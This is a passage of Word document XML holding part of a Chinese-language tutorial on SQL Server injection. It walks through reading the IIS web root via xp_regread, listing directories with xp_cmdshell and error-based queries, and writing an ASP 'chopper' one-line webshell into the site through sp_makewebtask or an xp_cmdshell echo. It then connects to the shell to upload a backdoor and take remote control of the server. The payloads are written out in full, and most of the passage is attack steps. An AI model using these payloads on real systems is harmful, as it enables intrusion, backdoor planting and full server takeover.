                      <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>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w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="15"/>
                      <w:szCs w:val="15"/>
                      <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
                    </w:rPr>
                    <w:t>DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng(lala) values(@result);</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="40B7360D" w14:textId="77777777" w:rsidR="003756DA" w:rsidRPr="00764DAB" w:rsidRDefault="003756DA" w:rsidP="004E668B">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w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="15"/>
                      <w:szCs w:val="15"/>
                      <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
                    </w:rPr>
                    <w:t xml:space="preserve">and 1=(select top 1 lala from labeng) </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="15"/>
                      <w:szCs w:val="15"/>
                      <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
                    </w:rPr>
                    <w:t>或者</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="15"/>
                      <w:szCs w:val="15"/>
                      <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
                    </w:rPr>
                    <w:t>and 1=(select count(*) from labeng where lala&gt;1)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4FA170A1" w14:textId="77777777" w:rsidR="003756DA" w:rsidRPr="00F0269B" w:rsidRDefault="003756DA" w:rsidP="00F0269B">
                  <w:pPr>
                    <w:ind w:firstLine="420"/>
                  </w:pPr>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C991E9" w14:textId="77777777" w:rsidR="00F0269B" w:rsidRPr="00764DAB" w:rsidRDefault="00F0269B" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EF56CF" w14:textId="77777777" w:rsidR="00F0269B" w:rsidRDefault="00F0269B" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE221C2" w14:textId="77777777" w:rsidR="00F0269B" w:rsidRDefault="00F0269B" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A35F228" w14:textId="77777777" w:rsidR="004E668B" w:rsidRDefault="004E668B" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3297CAD7" w14:textId="77777777" w:rsidR="002540EE"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得到Web路径为“c:\inetpub\wwwroot".但是在使用xp_cmdshell扩展查看该目录时，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044D5993"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26720A1C" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRDefault="00D269A4"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pict w14:anchorId="4CD08D2D">
          <v:shape id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:7.8pt;margin-top:42.15pt;width:434.85pt;height:170.65pt;z-index:251663360">
            <v:textbox style="mso-next-textbox:#_x0000_s1031">
              <w:txbxContent>
                <w:p w14:paraId="3CF50915" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="002540EE">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第三种方法：</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1F6A30FD" w14:textId="77777777" w:rsidR="003756DA" w:rsidRPr="00764DAB"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drop table black;create Table black(result varchar(7996) null, id int not null identity (1,1))--</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="47E622E4" w14:textId="77777777" w:rsidR="003756DA" w:rsidRPr="00764DAB"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 xml:space="preserve">;insert into black exec master..xp_cmdshell 'dir </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00764DAB">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
                      <w:kern w:val="0"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>c</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00764DAB">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
                      <w:kern w:val="0"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>:\</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00523E99">
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00764DAB">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
                      <w:kern w:val="0"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>'--</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="62D55B85" w14:textId="77777777" w:rsidR="003756DA" w:rsidRPr="00764DAB" w:rsidRDefault="003756DA" w:rsidP="002540EE">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nd (select result from black where id=1)&gt;0--</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2E24DD3A" w14:textId="77777777" w:rsidR="003756DA" w:rsidRPr="002540EE" w:rsidRDefault="003756DA" w:rsidP="002540EE">
                  <w:pPr>
                    <w:ind w:firstLine="420"/>
                  </w:pPr>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发现并非真实的Web路径。看来只有用dir命令慢慢查找Web路径。在浏览器中提交如下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFAA65D"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4DCD47F4"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574E3361"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6E1604F9"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5DC9C482"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20849967"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19FDC6A8" w14:textId="77777777" w:rsidR="002540EE"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37BAE463" w14:textId="77777777" w:rsidR="002540EE" w:rsidRPr="00764DAB" w:rsidRDefault="002540EE" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D87D23"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依次增加id的值，</w:t>
      </w:r>
      <w:r w:rsidR="008E3E17" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后在C盘wwwtest</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
      <w:r w:rsidR="008E3E17" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中发现了当前网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，提交以下链接(图2</w:t>
      </w:r>
      <w:r w:rsidR="008E3E17" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67457304" w14:textId="77777777" w:rsidR="008E3E17" w:rsidRPr="00764DAB" w:rsidRDefault="008E3E17"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624AF5">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nd (select result from black where id=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&gt;0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5A4F58" w14:textId="77777777" w:rsidR="008E3E17" w:rsidRDefault="008E3E17" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C4DED2" wp14:editId="56A51892">
            <wp:extent cx="5274310" cy="35394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3539431"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A2DC94" w14:textId="77777777" w:rsidR="00632D5C" w:rsidRPr="00E1271D" w:rsidRDefault="00632D5C" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                               图28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F4EC1D"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了一个名为“</w:t>
      </w:r>
      <w:r w:rsidR="008E3E17" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>wwwtest</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”的目录。从目录名上来看，很可能是Web路径。再用上面的方法查看该目录下的文件，发现是Web目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A12DFEA" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00611C84" w:rsidRDefault="00611C84" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2.5.6</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00611C84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3124E382"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先将一句话木马转换成URL格式，木马内容如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F38C159" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00764DAB" w:rsidRDefault="007E5E3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lt;%eval request("chopper")%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E6C57"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转换成URL格式如下(图2</w:t>
      </w:r>
      <w:r w:rsidR="00632D5C" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146F2CEF" w14:textId="77777777" w:rsidR="00632D5C" w:rsidRDefault="00632D5C" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16AC83AA" wp14:editId="7343D670">
            <wp:extent cx="5267862" cy="1781175"/>
            <wp:effectExtent l="19050" t="0" r="8988"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1783355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="081B92E3" w14:textId="77777777" w:rsidR="00632D5C" w:rsidRPr="008A04BB" w:rsidRDefault="00632D5C" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                              图29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DEBB93" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00764DAB" w:rsidRDefault="007E5E3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3c%25%65%76%61%6c%20%72%65%71%75%65%73%74%28%22%63%68%6f%70%70%65%72%22%29%25%3e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCEB738"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然后在浏览器中提交如下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08579765" w14:textId="77777777" w:rsidR="001213DE" w:rsidRDefault="001213D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exec sp_makewebtask 'c:\wwwtest\1.asp','select''</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%3c%25%65%76%61%6c%20%72%65%71%75%65%73%74%28%22%63%68%6f%70%70%65%72%22%29%25%3e</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'''--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357AC13" w14:textId="77777777" w:rsidR="0097255B" w:rsidRPr="0097255B" w:rsidRDefault="0097255B" w:rsidP="00512C8A">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="5" w:color="E1E1E8"/>
          <w:left w:val="single" w:sz="4" w:space="5" w:color="E1E1E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="5" w:color="E1E1E8"/>
          <w:right w:val="single" w:sz="4" w:space="5" w:color="E1E1E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F9"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="170" w:line="227" w:lineRule="atLeast"/>
        <w:ind w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00512C8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="48484C"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>如果报错，可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="0097255B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="48484C"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>exec sp_configure 'Web AssistantProcedures', 1; RECONFIGURE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="48484C"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="48484C"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>进行恢复，恢复还不行，换成前面的方法或者差异备份方法都可以</w:t>
      </w:r>
      <w:r w:rsidRPr="0097255B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="48484C"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>http://192.168.0.102/sqlserver/1.aspx?xxser=1%20;exec%20master..xp_cmdshell%20'Echo%20"&lt;%eval%20request("chopper")%&gt;"%20&gt;&gt;%20c:\wwwtest\iis-xxser.com--wwwroot\</w:t>
      </w:r>
      <w:r w:rsidR="00512C8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="48484C"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>muma</w:t>
      </w:r>
      <w:r w:rsidRPr="0097255B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="48484C"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>.asp'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75711916" w14:textId="77777777" w:rsidR="0097255B" w:rsidRPr="00764DAB" w:rsidRDefault="0097255B" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EDC4613" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00764DAB" w:rsidRDefault="00A126C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页面中返回execute执行错误信息，说明一句话木马写入成功。使用一句话木马客户端连接木马，可以方便地上传一个大型的ASP木马后门(图</w:t>
      </w:r>
      <w:r w:rsidR="00632D5C" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3378FBBA" w14:textId="77777777" w:rsidR="00632D5C" w:rsidRDefault="00632D5C" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C86840C" wp14:editId="1F846F7E">
            <wp:extent cx="5274310" cy="3752874"/>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3752874"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="435DEA95" w14:textId="77777777" w:rsidR="00857EAD" w:rsidRPr="00764DAB" w:rsidRDefault="00632D5C" w:rsidP="001A202D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>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图30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD3212" w14:textId="77777777" w:rsidR="00A126C3" w:rsidRPr="00611C84" w:rsidRDefault="00611C84" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2.5.7</w:t>
      </w:r>
      <w:r w:rsidR="00A126C3" w:rsidRPr="00611C84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>菜刀一句话连接执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00768B26" w14:textId="77777777" w:rsidR="00857EAD" w:rsidRPr="00644363" w:rsidRDefault="00A126C3" w:rsidP="00644363">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登录 Webshell后门，利用Webshell开启远程终端</w:t>
      </w:r>
      <w:r w:rsidR="007B130E" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行连接服务器，这样就可以控制整台服务器了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4E388" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="009F7585" w:rsidRDefault="003D5726"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lastRenderedPageBreak/>
        <w:t>2.2.6</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F5E97" w:rsidRPr="009F7585">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MsSQL注入猜解数据库技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4259B11F" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00C33E31" w:rsidP="001A202D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="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权限足够，利用MsSQL数据库的特性，是可以很轻易地入侵控制网站服务器的。但是很多时候注入点不一定能够执行存储过程，或者连接数据库的用户权限不够，那么就得像Access数据库那样猜解管理员表的字段、内容，进入后台想办法拿WebShell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ECD9F7" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="009F7585" w:rsidRDefault="00C35923" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2.6.1</w:t>
      </w:r>
      <w:r w:rsidR="00F9087E" w:rsidRPr="009F7585">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>having</w:t>
      </w:r>
      <w:r w:rsidR="00F9087E" w:rsidRPr="009F7585">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00F9087E" w:rsidRPr="009F7585">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>group by</w:t>
      </w:r>
      <w:r w:rsidR="00F9087E" w:rsidRPr="009F7585">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询爆表名和字段名</w:t>
      </w:r>
    </w:p>
